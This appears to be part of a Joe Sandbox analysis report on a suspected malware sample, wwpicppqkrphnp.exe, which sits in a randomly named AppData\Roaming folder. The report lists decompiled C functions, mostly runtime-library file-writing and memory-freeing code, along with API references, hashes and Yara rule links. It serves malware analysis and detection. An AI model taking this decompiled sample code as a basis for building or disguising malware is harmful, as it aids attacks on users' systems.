										 *(_t260 +  *((intOrPtr*)(0x417158 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E0040C6AC(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E00407C7F(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E00406936(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x417158 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E0040C4ED( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E0040C4ED();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00401C35(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

APIs

GetConsoleCP.KERNEL32 ref: 0040A927
__fassign.LIBCMT ref: 0040AB06
__fassign.LIBCMT ref: 0040AB23
WriteFile.KERNEL32(?,00406488,00000000,?,00000000), ref: 0040AB6B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040ABAB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040AC57

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 1204cc5d9a0eb02ce752479c0d8753b461032648df41855e190a65d87a6b8acd
Instruction ID: ac575513e1e51b0f3f0aaae7f1722e2331a20e17e6081957bed3ca193d280fb4
Opcode Fuzzy Hash: 1204cc5d9a0eb02ce752479c0d8753b461032648df41855e190a65d87a6b8acd
Instruction Fuzzy Hash: C1D1DB70E042489FDB15CFE8C8809EEBBB5BF48304F29416AE855BB381D234AD56CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004042F1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004042F1(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x416024 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00409F0C(_t13,  *0x416024);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00409F47(_t14,  *0x416024, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00409E8B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00409F47(_t18,  *0x416024, 0);
								} else {
									_t8 = E00409F47(_t18,  *0x416024, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0040439F(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(?,?,004042E8,00401E18,004019A5), ref: 004042FF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040430D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00404326
SetLastError.KERNEL32(00000000,004042E8,00401E18,004019A5), ref: 00404378

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2cf4d03c717006603613014055ed4f675f45cb557d1681b64b72138fc843da04
Instruction ID: 7f179c978d6e8454f63642bf347055dea5aac0a428f61dd6acbd727ed4218179
Opcode Fuzzy Hash: 2cf4d03c717006603613014055ed4f675f45cb557d1681b64b72138fc843da04
Instruction Fuzzy Hash: EA01B57270A2125ED62567B5AC8556B2FE4DB85778721423FFB20E41E1EB398C01514C

Uniqueness

Uniqueness Score: -1.00%

Function 004027C8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004027C8(void* __edx, intOrPtr _a4) {
				signed int _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				WCHAR* _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				WCHAR* _t25;
				WCHAR** _t35;
				struct HINSTANCE__* _t36;
				WCHAR* _t39;
				WCHAR* _t41;
				WCHAR* _t42;
				intOrPtr* _t43;
				WCHAR** _t44;
				intOrPtr _t47;
				WCHAR* _t48;
				WCHAR* _t54;
				void* _t57;
				WCHAR** _t58;
				WCHAR* _t64;
				WCHAR* _t66;

				_t57 = __edx;
				_pop(_t67);
				_t47 = _a4;
				if(_t47 != 0) {
					__eflags = _t47 - 2;
					if(_t47 == 2) {
						L6:
						GetModuleFileNameW(0, 0x416c68, 0x104);
						_t25 =  *0x416c48; // 0x2319de
						 *0x416c34 = 0x416c68;
						_v24 = _t25;
						__eflags = _t25;
						if(_t25 == 0) {
							L8:
							_t25 = 0x416c68;
							_v24 = 0x416c68;
						} else {
							__eflags =  *_t25;
							if( *_t25 == 0) {
								goto L8;
							}
						}
						_v12 = 0;
						_v20 = 0;
						_t64 = E004027D3(E00402951(_t25, 0, 0,  &_v12,  &_v20), _v12, _v20, 2);
						__eflags = _t64;
						if(__eflags != 0) {
							E00402951(_v24, _t64, _t64 + _v12 * 4,  &_v12,  &_v20);
							__eflags = _t47 - 1;
							if(_t47 != 1) {
								_v16 = 0;
								_push( &_v16);
								_t48 = E004072B0(_t47, _t57, 0, _t64);
								__eflags = _t48;
								if(_t48 == 0) {
									_t58 = _v16;
									_t54 = 0;
									_t35 = _t58;
									__eflags =  *_t58;
									if( *_t58 != 0) {
										do {
											_t35 =  &(_t35[1]);
											_t54 =  &(_t54[0]);
											__eflags =  *_t35;
										} while ( *_t35 != 0);
									}
									_t36 = 0;
									 *0x416c38 = _t54;
									_v16 = 0;
									_t48 = 0;
									 *0x416c40 = _t58;
								} else {
									_t36 = _v16;
								}
								E00405BB5(_t36);
								_v16 = 0;
							} else {
								_t41 = _v12 - 1;
								__eflags = _t41;
								 *0x416c38 = _t41;
								_t42 = _t64;
								_t64 = 0;
								 *0x416c40 = _t42;
								goto L13;
							}
						} else {
							_t43 = E004065F6(__eflags);
							_push(0xc);
							_pop(0);
							 *_t43 = 0;
							L13:
							_t48 = 0;
						}
						E00405BB5(_t64);
						_t39 = _t48;
					} else {
						__eflags = _t47 - 1;
						if(__eflags == 0) {
							goto L6;
						} else {
							_t44 = E004065F6(__eflags);
							_t66 = 0x16;
							 *_t44 = _t66;
							E00405C88();
							_t39 = _t66;
						}
					}
				} else {
					_t39 = 0;
				}
				return _t39;
			}

Strings

C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe, xrefs: 00402860, 00402867, 0040289B
p&, xrefs: 004028F0, 00402933

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe$p&
API String ID: 0-1229461694
Opcode ID: 453829f50a0fe7ada04892179e48c9dc874aac9624a2a6477084f48c88611c48
Instruction ID: 03271fe0b23b121f3e93002c3e1ad4f30497d1379f4dc4de92c253f5e0d9d1b1
Opcode Fuzzy Hash: 453829f50a0fe7ada04892179e48c9dc874aac9624a2a6477084f48c88611c48
Instruction Fuzzy Hash: E441A871A00215ABDB21EB999D85D9FB7B8EB84310B11417BE500B73D0D7B49A41D798

Uniqueness

Uniqueness Score: -1.00%

Function 00402471 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00402471(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x418000(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00402477
0x0040247b
0x00402486
0x0040248e
0x00402499
0x0040249f
0x004024a3
0x004024aa
0x004024b0
0x004024b0
0x004024b2
0x004024b7
0x00000000
0x004024bc
0x004024c3

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 00402486
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 00402499
FreeLibrary.KERNEL32(00000000,?,?,004024FB,?,?,0040257C,?,?,?), ref: 004024BC

Strings

mscoree.dll, xrefs: 0040247F
CorExitProcess, xrefs: 00402491

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 626555efc224bdb1bad64bac0d9527dc28404f6cd5792023940cdd3c72578110
Instruction ID: 9f67a5e104d30bcb1b26a24a34ec6484246661ca9c3d763845df77eea0d21c27
Opcode Fuzzy Hash: 626555efc224bdb1bad64bac0d9527dc28404f6cd5792023940cdd3c72578110
Instruction Fuzzy Hash: BBF0FE31A10619FBDB129B51DE0DBDEBA79AB44756F108075E805A11E0CBB88E40DA98

Uniqueness

Uniqueness Score: -1.00%

Function 00402237 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402237() {

				E00405BB5( *0x417398);
				 *0x417398 = 0;
				E00405BB5( *0x41739c);
				 *0x41739c = 0;
				E00405BB5( *0x416c3c);
				 *0x416c3c = 0;
				E00405BB5( *0x416c40);
				 *0x416c40 = 0;
				return 1;
			}

0x00402240
0x0040224d
0x00402253
0x0040225e
0x00402264
0x0040226f
0x00402275
0x0040227d
0x00402286

APIs

_free.LIBCMT ref: 00402240

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00402253
_free.LIBCMT ref: 00402264
_free.LIBCMT ref: 00402275

Strings

p&, xrefs: 0040227D

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p&
API String ID: 776569668-2826932214
Opcode ID: 2d3229d66c39f1a80a08cd669befc04ef1f45faf43100f3df4faf59e50691911
Instruction ID: e90212dccf04a321c434346c53befcb5f51f32ed567c279963bb210d00297663
Opcode Fuzzy Hash: 2d3229d66c39f1a80a08cd669befc04ef1f45faf43100f3df4faf59e50691911
Instruction Fuzzy Hash: 8DE04F704155249ADA226F26BC058CA3B71E744700302C07BFC14226B2FBB66212EFCE

Uniqueness

Uniqueness Score: -1.00%

Function 004067B1 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004067B1(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x416708; // 0x416758
					if(_t23 != 0) {
						E00405BB5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x41670c; // 0x4173a0
					if(_t24 != 0) {
						E00405BB5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x416710; // 0x4173a0
					if(_t25 != 0) {
						E00405BB5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x416738; // 0x41675c
					if(_t26 != 0) {
						E00405BB5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x41673c; // 0x4173a4
					if(_t27 != 0) {
						return E00405BB5(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 004067C9

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 004067DB
_free.LIBCMT ref: 004067ED
_free.LIBCMT ref: 004067FF
_free.LIBCMT ref: 00406811

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80122fae68721bce9a2f66b55e03fd57467376553dfd7fd007525a1624bb2066
Instruction ID: 889dcc508e08d98f5f743580ea195f14572a9fb5800363ce21ab533a1115f212
Opcode Fuzzy Hash: 80122fae68721bce9a2f66b55e03fd57467376553dfd7fd007525a1624bb2066
Instruction Fuzzy Hash: D6F03C32505600A7DA21EB69E4C2C5773F9EA40718766887AF415E77C0DA78FC808E6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A68C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040A68C(signed int _a4, void* _a8, signed int _a12) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				void* _t58;
				signed int _t66;
				signed int _t69;
				intOrPtr _t70;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t82;
				signed int _t85;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				void* _t112;

				_t95 = _a12;
				_t58 = _a8;
				_v8 = _t58;
				_v20 = _t95;
				_t108 = _a4;
				if(_t95 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t116 = _t58;
				if(_t58 != 0) {
					_t101 = _t108 >> 6;
					_t104 = (_t108 & 0x0000003f) * 0x38;
					_v12 = _t101;
					_t102 =  *((intOrPtr*)(0x417158 + _t101 * 4));
					_v16 = _t104;
					_t92 =  *((intOrPtr*)(_t102 + _t104 + 0x29));
					__eflags = _t92 - 2;
					if(_t92 == 2) {
						L6:
						__eflags =  !_t95 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						L7:
						__eflags =  *(_t102 + _t104 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E00409BFF(_t108, 0, 0, 2);
							_t112 = _t112 + 0x10;
						}
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t69 = E0040A86E(_t102, __eflags, _t108);
						__eflags = _t69;
						if(_t69 == 0) {
							_t97 = _v12;
							_t103 = _v16;
							_t70 =  *((intOrPtr*)(0x417158 + _t97 * 4));
							__eflags =  *((char*)(_t70 + _t103 + 0x28));
							if( *((char*)(_t70 + _t103 + 0x28)) >= 0) {
								_t93 = _v8;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t73 = WriteFile( *(_t70 + _t103 + 0x18), _t93, _v20,  &_v40, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									_v44 = GetLastError();
								}
								goto L26;
							}
							_t93 = _v8;
							_t82 = _t92;
							__eflags = _t82;
							if(_t82 == 0) {
								E0040ACF1( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							_t85 = _t82 - 1;
							__eflags = _t85;
							if(_t85 == 0) {
								_t84 = E0040AEB5( &_v44, _t108, _t93, _v20);
								goto L15;
							}
							__eflags = _t85 != 1;
							if(_t85 != 1) {
								goto L28;
							}
							_t84 = E0040ADCC( &_v44, _t108, _t93, _v20);
							goto L15;
						} else {
							__eflags = _t92;
							if(__eflags == 0) {
								_t93 = _v8;
								_t84 = E0040A8DF(__eflags,  &_v44, _t108, _t93, _v20);
								L15:
								L13:
								L26:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								L27:
								_t97 = _v12;
								_t103 = _v16;
								L28:
								_t74 = _v28;
								__eflags = _t74;
								if(_t74 != 0) {
									return _t74 - _v24;
								}
								_t76 = _v32;
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  *( *((intOrPtr*)(0x417158 + _t97 * 4)) + _t103 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E004065F6(__eflags))) = 0x1c;
										_t66 = E00406609(__eflags);
										 *_t66 =  *_t66 & 0x00000000;
										L3:
										return _t66 | 0xffffffff;
									}
									__eflags =  *_t93 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t110 = 5;
								__eflags = _t76 - _t110;
								if(__eflags != 0) {
									_t66 = E0040661C(_t76);
								} else {
									 *((intOrPtr*)(E004065F6(__eflags))) = 9;
									_t66 = E00406609(__eflags);
									 *_t66 = _t110;
								}
								goto L3;
							}
							__eflags = _t92 - 1 - 1;
							_t93 = _v8;
							if(_t92 - 1 > 1) {
								goto L27;
							}
							E0040AC89( &_v44, _t93, _v20);
							goto L13;
						}
					}
					__eflags = _t92 - 1;
					if(_t92 != 1) {
						goto L7;
					}
					goto L6;
				}
				L2:
				 *(E00406609(_t116)) =  *_t64 & 0x00000000;
				 *((intOrPtr*)(E004065F6( *_t64))) = 0x16;
				_t66 = E00405C88();
				goto L3;
			}

APIs

Part of subcall function 0040A8DF: GetConsoleCP.KERNEL32 ref: 0040A927

WriteFile.KERNEL32(?,00000000,00406374,?,00000000), ref: 0040A7DD
GetLastError.KERNEL32 ref: 0040A7E7
__dosmaperr.LIBCMT ref: 0040A82C

Strings

tc@, xrefs: 0040A68E

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: tc@
API String ID: 251514795-2494914666
Opcode ID: b987decbba39891d74781a38a4ea2db11a54a22ffd1a21a3dd236c37fa384e78
Instruction ID: cd9d284c9c5dac6d88946d789ca62f1d70c7d666ffa63a704383a7b1ada9dddc
Opcode Fuzzy Hash: b987decbba39891d74781a38a4ea2db11a54a22ffd1a21a3dd236c37fa384e78
Instruction Fuzzy Hash: 6251D571900309AFEB10ABA5C885BEFB7B9EF05314F088437E400BB2D2D679DD51976A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA71 Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0040CA71(signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				signed int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0040CBE1( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E004065F6(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00409BFF(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00408141(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E00409BFF(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
						_t36 = E00406609(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E0040695A(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E004033CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0040A68C(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00406609(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E004065F6(_t70)));
										E00405BB5(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E004033CE(_t56, _t50, _v12);
							E00405BB5(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E004065F6(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

APIs

_free.LIBCMT ref: 0040CB41
_free.LIBCMT ref: 0040CB6A
SetEndOfFile.KERNEL32(00000000,0040C21D,00000000,00408839,?,?,?,?,?,?,?,0040C21D,00408839,00000000), ref: 0040CB9C
GetLastError.KERNEL32(?,?,?,?,?,?,?,0040C21D,00408839,00000000,?,?,?,?,00000000,?), ref: 0040CBB8

Memory Dump Source

Source File: 00000009.00000002.959127717.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.959121439.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.959148756.0000000000416000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_wwpicppqkrphnp.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 70a85d22a1633a54e0167d194511b95707fd8edec48cdd458c468ea1755522f6
Instruction ID: cf588b9212c2719ff7c3ba49e6d11ea963b6a5c79d2570e0006e6b44ed36ab14
Opcode Fuzzy Hash: 70a85d22a1633a54e0167d194511b95707fd8edec48cdd458c468ea1755522f6
Instruction Fuzzy Hash: B741E432900204DBDB11ABB9AD83B9F3775AF44364F25063BF814B72D2EA3CE8504769

Uniqueness

Uniqueness Score: -1.00%

Function 00404C86 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00404C86(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
